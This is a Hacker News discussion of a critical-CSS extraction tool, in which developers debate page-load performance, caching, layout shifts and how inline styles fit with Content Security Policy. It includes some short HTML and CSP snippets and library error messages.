224 pointsby stevenpotts2 days ago29 comments
  • lelandfe2 days ago
    Nice one. Would be cool if this also handled responsiveness. The need to dedupe responsive critical styles has made me resort to manually editing all critical stylesheets I've ever made.

    I also see that this brings in CSS variable definitions (sorry, ~custom properties~) and things like that. Since critical CSS's size matters so much, it might be worth giving an option to compile all of that down.

    > Place your original non-critical CSS <link> tags just before the closing </body> tag

    I don't recommend doing this: you still want the CSS downloaded urgently, critical CSS is a façade. Moving to the end of body means the good stuff is discovered late, and thus downloaded late (and will block render if the preloader[0] discovers it).

    These days I'd recommend:

        <link rel="preload" href="styles.css" as="style" onload="this.rel='stylesheet'">
    
        <noscript><link rel="stylesheet" href="styles.css"></noscript>
    
    [0] https://web.dev/articles/preload-scanner
    • worblea day ago

          <link rel="preload" href="styles.css" as="style" onload="this.rel='stylesheet'">
      
      Wouldn't this be blocked by a CSP that doesn't allow unsafe-inline?
      • a day ago
        undefined
      • jy14898a day ago
        unsafe-hashes is a decent alternative
    • larodi2 days ago
      the prefetch attribute and other HTTP header hints, combined with proper CDN setups does almost the same. and would not require critical CSS to be nonstop rebuilt as the page develops. a properly configured CF is insanely fast.
      • a day ago
        undefined
      • todotask2a day ago
        > HTTP header hints

        Assume it's either 103 Early Hints or Resource Hints in HTTP/1.1 and 2.0.

    • Gabrys12 days ago
      +1 on responsiveness
    • youngtaffa day ago
      I wouldn’t use the JS hack to load CSS…

      When the stylesheet loads and is applied to the CSSOM it’s going to trigger layout and style calculations for the elements it’s applied to maybe even the whole page

      Browsers are pretty eager at fetching stylesheets even those at the bottom of the page

      • lelandfea day ago
        That stylesheet application was going to happen anyway, the difference now is that FCP will occur before it.

        > Browsers are pretty eager at fetching stylesheets even those at the bottom of the page

        Browsers begin fetching resources as they discover them. For a big enough document, that will mean low placed resources will suffer.

        • youngtaff13 hours ago
          Sure that work is going to happen but often what you see is multiple stylesheets loaded using the async hack which results in multiple style and layout calculations as the browser can coalesce them because it doesn’t know that they’re stylesheets or when they will arrive

          The whole philosophy of critical styles philosophy being those about the fold is a mistake in my view

          Far better to adopt approaches like those recommended by Andy Bell that dramatically reduces stylesheet size

          And do critical styles “correctly” i.e. load those that are needed to render the initial page and load the ones that rely on interactions separately

  • oneeyedpigeon2 days ago
    Feels like premature optimisation to me. Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile? Maybe with the most complex web apps, I guess, but for almost all cases, I would have thought writing clean CSS, HTML, and JavaScript would render this unnecessary or even counterproductive.
    • dan-baileya day ago
      Oh my god, yes, this is useful. I do some freelance dev work for a small marketing agency, and I inherit a lot of Wordpress sites that show all the hallmarks of passing through multiple developers/agencies over the years, and the CSS and Javascript are *always* crufty with years of accumulated bad practices. I'm eager to try this.
    • bawolffa day ago
      > Are there really cases where the CSS is so complex or the page loads so many resources that this effort is worthwhile?

      On the contrary, the more complex the css is or the more resources loaded, the less this would be worthwhile.

      The thing i think they are trying to optimize is latency due to RTT. When you first request the html file, the browser needs to read it before knowing the next thing to request. This requires a round trip to the server, which has latency (pesky speed of light). The larger your (critical) css, the more expensive this optimisation is so the less likely it is a net benefit.

    • Gabrys12 days ago
      I would pay good money for this tool ~12 years ago. We had a site with enormous amounts of CSS that accumulated over the years and it was really unclear which rules are and which aren't critical
      • korm25 minutes ago
        The mod_pagespeed filter "prioritize_critical_css" was released exactly 12 years ago in early May 2013. At least 3 more popular critical css tools were released the following year, integrating with Grunt, Gulp, and later Webpack.
    • acjohnson55a day ago
      For many sites, this probably is a premature optimization. But for sites that live off of click-through, like news/media, getting the text on screen is critical. Bounce rate starts to go up and ad revenue drops as soon as page loads are less than "immediate", which is about 1 second. The full page can actually be quite heavy once all the ads, scripts, and media load.

      We were doing this optimization more than a decade ago when I worked at HuffPost.

    • dimmkea day ago
      Seriously. When I look at the modern state of front-end development, it's actually fucking bonkers to me. Stuff like Lighthouse has caused people to reach for optimizations that are completely absurd.

      This might make an arbitrary number go up in test suites, at the cost of massively increasing build complexity and reducing ease of working on the project all for very minimal if any improvement for the hypothetical end user (who will be subject to much greater forces out of the developer's control like their network speed)

      I see so much stuff like this, then regularly see websites that are riddled with what I would consider to be very basic user interface and state management errors. It's absolutely infuriating.

      • rglovera day ago
        Yup. Give people a number or stat to obsess over and they'll obsess over it (while ignoring the more meaningful work like stability and fixing real, user-facing bugs).

        Over-obsession with KPIs/arbitrary numbers is one of the side-effects of managerial culture that badly needs to die.

        • mediumsmart17 hours ago
          It’s just a few meaningful numbers like 0 accessibility errors, A+ for the securityheaders, flawless result on webkolls 5july net plus below 1 second loading time on pagespeed mobile. Once that has been achieved obsessing over stabilizing a flaky bloat pudding while patching over bugs aka features that annoy any user will have died.
    • leptonsa day ago
      >Feels like premature optimisation to me.

      To me thinking about how CSS loads is task #1, but I probably have some unique needs.

      We were losing clients due to our web offering scoring poorly on page speed tests. Page speed being part of how a page is ranked can affect SEO (depending on who you ask), so it is very important to our clients. It's not my job to explain how I think SEO works, it's my job to make our clients happy.

      I had to design a whole new system to get page speed scores to 100% on Google Lighthouse, which many of our clients were using to test their site's performance. When creating a site optimized for performance, how the CSS and JS and everything loads needs to be thought about before implementing the pages. It can be pretty difficult to optimize these things after-the-fact. We made pretty much everything on the page load in-line including JS and CSS, and the CSS for what displays "above the fold" loads above the HTML it styles. Everything "below the fold" gets loaded below the fold. No FOUC, nothing blocking the rendering of the page. No extra HTTP requests are made to load any of the content. A lot of the JS "below the fold" does not even get evaluated until it is scrolled into view, because that can also slow down page load speed. I took all the advice Google Lighthouse was giving me, and implemented our pages in a way that satisfies it completely. It wasn't really that difficult but it required me changing my thinking about how to approach building websites.

      We were coming from a system that we didn't control, where they decided to load all of the CSS for the entire website on every page, which was amounting to about 3 to 4 MB of CSS alone, and the Javascript was even worse. There was never an attempt to optimize that system from the start, and now many years later they can't seem to optimize it at all. I won't name that system because we still build on it, but it's a real problem for us when a client compares their SEO and page speed scores to their competitors and then they leave us for our competitors, which score only a bit better for page speed.

      If performance is the goal, there is no such thing as premature optimization, it has to be thought about from the start. So far our clients have been very happy about their 100% page speed scores (100% even on mobile), and our competition can't come anywhere close, unless they put in the work and start thinking differently about the problem.

      I actually tried the tool that is the subject of this post on my sites, and it wouldn't work - likely because there is nothing to optimize. We simply don't do any HTTP requests for CSS, and the CSS we need "above the fold" is already "above the fold". I tried it on one of the old pages and it did give a result, but I don't need it because we don't build pages like we used to anymore.

  • todotask22 days ago
    When I tested mine, I got the following:

    Built on Astro web framework

    HTML: 27.52KB uncompressed (6.10KB compressed)

    JS: <10KB (compressed)

    Critical CSS: 57KB uncompressed (7KB compressed) — tested using this site for performance analysis.

    In comparison, many similar sites range from 100KB (uncompressed) to as much as 1MB.

    The thing is, I can build clean HTML with no inline CSS or JavaScript. I also added resource hints (not Early Hints, since my Nginx setup doesn't support that out of the box), which slightly improve load times when combined with HTTP/2 and short-interval caching via Nginx. This setup allows me to hit a 100/100 performance score without relying on Critical CSS or inline JavaScript.

    If every page adds 7KB, isn’t it wasteful—especially when all you need is a lightweight SPA or, better yet, more edge caching to reduce the carbon footprint? We don’t need to keep transmitting unnecessary data around the world with bloated HTML like Elementor for WordPress.

    Why serve users unnecessary bloat? Mobile devices have limited battery life. It's not impossible to achieve lighting fast experience once you move away from shared hosting territory.

    • robotfelixa day ago
      It's worth noting that including Critical CSS in every page load isn't the only way to use it.

      A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already) or only using the Critical CSS technique for pages that commonly come at the start of a session.

      • todotask215 hours ago
        > A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already

        I’ve thought about that before but couldn’t figure out the ideal approach. Using a unique session cookie for non-logged in users isn’t feasible, as it could lead to memory or storage issues if a malicious actor attempts a DDoS attack.

        I believe this approach also doesn’t work well for static pages, which are likely already hosted close to users.

        One useful trick to keep in mind is that CSS content-visibility only applies in certain scenarios. One agency I came across using <iframe> for every section is a bad idea.

        So my conclusion is mobile-first CSS is generally more practical and use PWA which I'm building now for site that has lots of listings.

    • kijin2 days ago
      Yeah, it's a neat trick but kinda pointless. In a world with CDNs and HTTP/2, all this does is waste bandwidth in order to look slightly better in artificial benchmarks.

      It might improve time to first paint by 10-20ms, but this is a webpage, not a first-person shooter. Besides, subsequent page loads will be slower.

      • aitchnyu2 days ago
        Yup, whereever we deviated from straightforward asset downloads to optimize something, we always end up slower or buggy. Like manually downloading display images or using websockets to upload stuff. Turns out servers and browsers have spent more person-years optimizing it better than me.
      • todotask2a day ago
        And Critical CSS requires reducing the CSP (Content Security Policy), which I have already hardened almost entirely along with Permissions Policy.
      • nashashmia day ago
        Imagine this: before serving the page, a filter seeks out the critical css, inserts it, and removes all css links. Greatly improving page load times and reducing CDN loads.

        Edit: on second reading, it seems like you are saying when another page from the same server with the same style loads again, the css would have to be reloaded and This increases bandwidth in cases where a site visitor loads multiple pages. So yes it is optimum for conditions where the referrer is external to the site.

  • lxea day ago
    This is a footgun. You'll get a very consistent flash of unstyled content. It's not just an aesthetics issue -- when layout shifts in the middle of a page load, as your "non-critical" styles are applied, and user is interacting with something, it will kill your usability.
    • zaphodiasa day ago
      isn't the whole point avoiding FOUC, while also avoiding to block the rendering for CSS network requests?
      • lxea day ago
        Unless you're sure that your the "non-critical" css doesn't cause layout shifts (aka, it doesn't overload any "critical" styles), you're gonna see layout shifts even on fast connections if you load some styles at the top of the document and then do a link rel at the bottom.
        • rtsila day ago
          The critical css should cover everything above the fold to avoid that visible reflow.
          • youngtaffa day ago
            Where’s the fold in a world of 000’s of viewports?
          • lxea day ago
            Then what does the "non-critical" css do?
            • bawolffa day ago
              The non-critical things?

              I mean, i agree with you that this is insanely easy to screw up. However in most websites there is obviously css which doesn't cause reflows and is not needed for first paint. Actually separating that out correctly seems easy to mess up, but it obviously exists.

      • a day ago
        undefined
  • stevenpotts2 days ago
    I searched online for tools to extract the critical css of a website for one of my clients, I couldn't find one that did the job so I did so after using Puppeteer locally and then decided to share the solution I used that let's you specify how long to wait after page load to extract the styles; even found a paid one but requested refund after it didn't work.

    Feedback welcome, it's free for now.

    • jefozabuss2 days ago
      What was the problem with something like https://www.npmjs.com/package/penthouse ?
    • al_borland2 days ago
      FYI: While a bit of an edge case, as I don’t know why anyone would do this realistically… If a site without CSS is passed, it throws an error.
    • promiseofbeans2 days ago
      Is the code somewhere? This seems like it'd be really useful as a Vite/Astro plugin
      • cAtte_2 days ago
        yeah, doing this manual copy-paste process every time you change something would count as cruel and unusual punishment
    • indeyets2 days ago
      Is it the UI for penthouse lib? Settings look very similar :)
  • bawolffa day ago
    I guess this just assumes that this is the first view of your page and no user has css resources cached?

    Or maybe they are saying this would always be worth it?

    I assume it'd be a trade off between a number of factors. How many returning vs new visitors? Is css served with proper cache-control headers, 103 early hints and in a cdn? How big is your critical css, and how much of your critical html does it push out of the initial congestion window?

  • defied8 hours ago
    We created this as a free tool a while back on TestingBot: https://testingbot.com/free-online-tools/critical-css-genera....

    It uses a remote browser to start a Puppeteer session and runs JavaScript code to extract the critical CSS needed for above-the-fold content. We chose Puppeteer because it’s fast to instrument the browser and works well even on JavaScript-heavy sites.

    • stevenpottsan hour ago
      I will test it out, didn't find it!
  • austin-cheney2 days ago
    When I was doing performance examinations from localhost I found that CSS was mostly inconsequential if written at least vaguely efficiently and requested as early as possible from the HTML. By completely removing CSS I might be able to save up to 7ms of load time, but that was extremely hard to tell because that was well within the variance between test intervals.

    https://github.com/prettydiff/wisdom/blob/master/performance...

    • bawolffa day ago
      Obviously trying to do an optimization designed to reduce the impact of latency between client <-> server is going to have no impact if you are testing on localhost where latency is already effectively zero.

      That's not to say i think this optimization is neccesarily worth it, just that testing on localhost is not a good test of this.

  • RadiozRadioza day ago
    I prefer a different approach: write your HTML in such a way that the page makes sense and is usable without CSS. It's also a good guiding star for your page's complexity; if your document markup is simple, sensible and meaningful, you're probably not overcomplicating your layout.
    • chipsraffertya day ago
      This doesn't really work for sites where reading text left to right, top to bottom is not the primary focus.
  • GavinAnderegga day ago
    Neat idea. I tried it on my site (https://anderegg.ca/) which already inlines its CSS, and got an error from the underlying library (https://www.npmjs.com/package/penthouse):

        {"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
  • kqr2 days ago
    Hm. When I tried this on my site it retained a debugging element that is decidedly not required, but adds a lot of bytes to the CSS:

        body::after{display:none;content:"";background-image:url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' width='1' height='29'><rect style='fill: rgb(196,196,196);' width='1' height='0.25px' x='0' y='28'/></svg>");position:absolute;top:23px;left:0px;z-index:9998;opacity:1;width:1425px;height:3693px;background-size:auto 1.414rem;background-position-y:0.6rem}
    
    (It lets me uncheck the "display: none" rule in the developer tools to get a baseline grid overlaid on the site to make sure things line up. They don't anymore because I forgot I had that in there until I saw it now!)
  • weo3deva day ago
    Not a fan.

    I'm waiting for the day developers realize the fallacy of sticking with pixels as their measurement for Things on the Internet.

    With a deeper understanding of CSS, one would recognize that simply parsing it out for only the components "above the fold" (which, why are pixels being used here in such an assumptive manner?), completely misses what is being used in modern CSS today - global variables, content-centric declarations, units based on character-widths, and so many other tools that would negate "needing" to do this in the first place.

  • Brajeshwar2 days ago
    I’ve been away for quite a while, so just a loud thinking.

    With tools such as PostCSS, and servers serving zipped styles across CDN, maintaining a single request to the styles; does it really benefit from breaking up the styles these days?

    Also, I’m going to assume, besides the core styles that run a website, anything that is loaded later can come in with its specific styles as part of the HTML/JS.

    For the critical CSS thing, we used to kinda do it by hand with some automation more as a toolset to help us decide how much to include (inside the HTML itself - `<styles>`) and then insert the stylesheet. But then, we always found it better to set a Stylesheet Budget and work with it.

    • a_graya day ago
      > serving zipped styles across CDN

      CDNs haven't been cached across domains for years. I.e. using a CDN is no faster than a server serving it itself (usually slower because of DNS lookups, but sometimes slightly faster if the geolocation is closer if the DNS was already looked up).

      • bigbuppoa day ago
        The performance impact of CDNs are definitely a complicated matter and always have been. They aren't a magic solution to any problems unless you're exceeding the origin's available bandwidth, or are serving up something that should be cacheable but somehow can't live without whatever it is that Elementor does that makes it worth every request taking 75 seconds to complete.
  • jer0me2 days ago
    Kind of funny that the agency that made this has a loader on their site.
    • Manfred2 days ago
      It would only be ironic if they released a tool to get rid of loading on a page.

      > Critical CSS refers to the minimal set of CSS rules required to render the visible portion of a webpage (above the fold).

      In reality the tool is aimed to style most of the page without loading additional assets so you don't get a jarring repaint when visiting the site.

      • chrismorgana day ago
        I prepared a comment about how the whole thing should be well under 5KB uncompressed, plus four small images and a background video that I couldn’t quite figure out, and about how the loader made no sense and made things worse. But then I checked in Chromium before stopping, and discovered that apparently the website is just completely broken in Firefox for some reason, so that you only get to see the above-the-fold content. But it still definitely hasn’t earned the loader. And also demonstrates why messing with scrolling is a bad idea.
  • sublinear2 days ago
    Non-starter for all but hobby websites since it's incompatible with any content security policy disallowing inline style tags.

    Edit regarding replies to this comment: I'm sure many will get a kick out of your workarounds and they're all worth posting in the spirit of HN, however I am talking about CSPs that disallow shenanigans. Carry on though :^)

    • efortis2 days ago
      You can allow safe inline CSS with a nonce. For example:

        <style nonce="sha256-Ce2SAZQd/zkqF/eKoRIUmEqKy31enl1LPzhnYs3Zb/I=">
          html { background: red }
        </style>
      
      And a CSP like this

        default-src 'self'; style-src 'sha256-Ce2SAZQd/zkqF/eKoRIUmEqKy31enl1LPzhnYs3Zb/I='
      
      
      Here's how I automate mine:

      https://github.com/uxtely/js-utils/blob/ad7d9531e108403a4146...

    • its-summertime2 days ago
      Its completely compatible, if you separate dynamic content until after the critical css is loaded: https://posts.summerti.me/being-unsafe-safely/
    • pjc502 days ago
      > content security policy disallowing inline style tags

      Wait, why on earth is this a thing?

      • bawolffa day ago
        The threats solved by restricting CSS with CSP are pretty minor, but generally its to prevent injection attacks that do the following:

        - injecting css to restyle the page as part of a social engineering attack or to otherwise trick the user into doing something stupid

        - using css to load an image or something to track users viewing the page or capture their IP address

        - leak the values of attributes on the page (you can do complex things with ^= and ~= selectors to leak attribute values). Sometimes page text contents can also be leaked using tricks with fonts and scrollbars (not sure if that still works on modern browsers).

        On the whole though, the surface area is small compared to javascript. I often see people restrict css before js (or doing the js restrictions incorrectly) because restricting css is much easier, but that is really silly as an attacker will always reach for javascript first if its available.

      • hombre_fatala day ago
        I guess the main case is if user-generated content has an escape bug that lets the user inject a <style> tag?
        • throwaway290a day ago
          If only this was about UGC. Most of it can have nothing to do with actual users. Think stuff like ads or other injects like a dependency of dependency of dependency of your frontend app compromised by a north korean hacker.
    • yakshaving_jgt2 days ago
      That’s a good point, though can’t this instance be whitelisted with a nonce?
      • sublinear2 days ago
        You could, but in the real world not every frontend dev has control over the CSP on the server allowing nonces to even be an option.

        Even when they do they might be subject to a security audit forbidding it. There's two reasons nonces can suck: first is that nonces may be passed around for 3rd party script usage and that blows a hole in your security policy, and the other is that many implementations to generate nonces are not implemented correctly, so the security team might have less trust in devs.

        It really depends on the organization and project. Once you start getting near the security fence you may find it's more trouble than it's worth.

        I would try to find less complicated solutions for small details like this. Obvious question might be why your CSS can't be a separate file that is small enough to not cause a performance issue.

  • aligundogdua day ago
    Is there any limit etc. It gives an error on my first try.

    {"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}

  • crazygringoa day ago
    I don't really understand the point of this.

    Most of the CSS that gets used below the fold on a single page on most pages, gets used above it too. Especially when considering it needs to handle large desktop monitors, and responsiveness. And then remaining part (e.g. styling a footer) is tiny.

    The CSS "bloat" that you might want to delay loading is CSS for the rest of the entire site, including all sorts of legacy stuff that might not even be used anymore.

    There are lots of strategies for how to load CSS used only by the page, as opposed to the site, which involve various tradeoffs, but can be worth it.

    But loading CSS for part of a page seems almost nonsensical. It's not like lazy-loading large images, where we're sometimes talking about megabytes. The CSS used on any single page is usually pretty small to begin with, and even smaller zipped.

    • davidmurdoch21 hours ago
      It reduces round-trips. The ultimate goal used to be (in the 2010s) to ensure the first tcp packet had everything the browser needed to render the layout without any additional round-trips. Rare to go that extreme these days, of course.
      • crazygringo6 hours ago
        But it increases overall bandwidth, because you're adding a bunch of CSS to every page that can't be cached.

        That's a terrible tradeoff.

        And if a site has a single CSS file, there's only ever a CSS round-trip on the first page. There aren't any round-trips afterwards.

        • davidmurdoch4 hours ago
          Well, yes, but also no. It really depends on your website. SPAs can benefit, especially ones that utilize server-side rendering, as they don't have multiple pages anyway. And not all MPAs need to optimize for multi-page navigation either; sometimes websites aren't intended to be heavily navigated, or if they are, common navigation can make use of preloads.

          This technique is usually combined with preloads so the parser can identify assets that should be prefetched while the remaining packets are still being downloaded.

          If your "Critical CSS" is small enough (i.e., it fit well within the client's CWND), it is very possible it doesn't increase the total number of roundtrips at all.

          As a web developer, if you are optimizing for above-the-fold CSS, you are already optimizing in lots of other ways, and should be fully cognizant of the potential trades for the optimization solutions that are available to you.

          • crazygringo2 hours ago
            I really continue to disagree. SPA's seem like the least likely to benefit of anything at all -- they often don't even have a concept of "below the fold", as they have a workspace-like environment, not a scrolling-document one. And not only is loading time generally less important for them (unlike news articles), but they're used constantly, so the CSS is almost always cached anyways.

            There are lots of ways to optimize CSS. I continue to think this particular one is not a good idea under any circumstance, because it's anti-caching and eliminating a since round-trip once is just not ever going to be worth it.

            • davidmurdoch26 minutes ago
              Doesn't matter if you disagree, it is still an optimization tool that can be used in some circumstances.

              The data is most definitely cached if the server sets the cache expiry for the HTML file, so "anti-caching" makes no sense and is completely orthogonal to the optimization.

              If the page's critical CSS is small enough you can deliver an HTML page where the initial render a) happens sooner, and b) is a complete Skelton of your layout + initial content. All at the low low price of ~0 additional client-server roundtrips.

              Fun fact: facebook inlines a `style` tag and all HTML necessary to render their initial loading screen. It isn't what I would call "above the fold" CSS, but it is what is referred to as "Critical CSS".

              Aside: the most popular and most-used SPAs are scrollers: twitter, instagram, facebook, github, etc, so now I wonder if you might be just trolling?

  • juancroldana day ago
    This is a great idea even for a building step in web projects. You set a list of viewports you want to optimize for in your package.json, import critical-css as a dev dependency, configure it in your vite.config.js or equivalent, and way to go
  • gitroom2 days ago
    the amount of tiny tweaks that stack up in css is kinda nuts tbh - always felt like chasing performance can be endless, makes me wonder if any dev really feels satisfied with their setup or if it's just a bunch of tradeoffs
    • internettera day ago
      I am. I don't know if its perfect but it is more than good enough.
  • lenkite2 days ago
    Assuming you are using an atomic CSS based framework like tailwind, this would be unnecessary right ? Since all the CSS class names are anyways in-lined with the element.
    • DecoySalamander2 days ago
      Your page would still need the full CSS sheet loaded to render properly - tailwing classes do nothing on their own.
      • hombre_fatala day ago
        That said, if all of your css is referenced by html classes, it would be trivial to look at the html that's above the fold and derive which css you need to load first which could be kinda cool.
  • Recursinga day ago
    See also beasties ( https://github.com/danielroe/beasties ) formerly critters ( https://github.com/GoogleChromeLabs/critters ) which can be used to do this during SSR/SSG and is built into Nuxt and NextJS
  • aabbcc124119 hours ago
    It will be great if it is package as a library
  • tiffanyha day ago
    Seems to only work if the CSS is an external file.

    (Not embedded within the HEAD/STYLE tag)

  • worthless-trash2 days ago
    Why worry about this when companies pakage 10mb of javascript. Is this really where the problem is ?
    • bigbuppoa day ago
      I'm sad to say that the average is now 11MB.
    • chipsraffertya day ago
      If a candy or soda can go from 50g sugar to 40g without a significant change in flavor, they definitely want to. They don't have to get to 5g for it to be worthwhile.
  • n3storm2 days ago
    Wordpress plugins and builders like Divi and Elementor has been inserting all css for every page part or component anywhere in the body for years. I hate it. But, thas this critical css means they have beeing doing it right all along?
    • optimog2 days ago
      No, having an external file makes it cacheable locally. If every new page loads some of the same css again and again, it's a waste of bandwith. You should already have the stylesheet on your computer by then.
      • Klonoar21 hours ago
        I often wonder if this bandwidth is as big a deal as people make it out to be.

        On a very high traffic site, sure. Anything smaller and I’d argue you should just shove everything down the pipe in one request if you can.

        If the bandwidth bothers you, delete an image. You likely don’t have anywhere near that amount in CSS to make up.

      • n3storma day ago
        thank you.

        anybody can tell me why I got two downvotes from my question?

  • rado2 days ago
    Not working in Safari. Says ‘done’ but Generated CSS box remains empty
    • k4rlia day ago
      Does not work in IE11 either :(
  • vayliana day ago
    > Better Lighthouse scores

    What does that mean? What is Lighthouse?

  • Theodoresa day ago
    This comes in handy with the bloated codebase I am running from, bravo.

    My problem is the codebase I am running towards. I am making headway with scoped CSS, however, Firefox does not have it yet. I keep checking in on Firefox to see when that is going to support scoped CSS but I have not been able to determine what the hold up is.

    Does anyone have scoped CSS working with a workaround or compromise for Firefox?

  • Guptos2 days ago
    [flagged]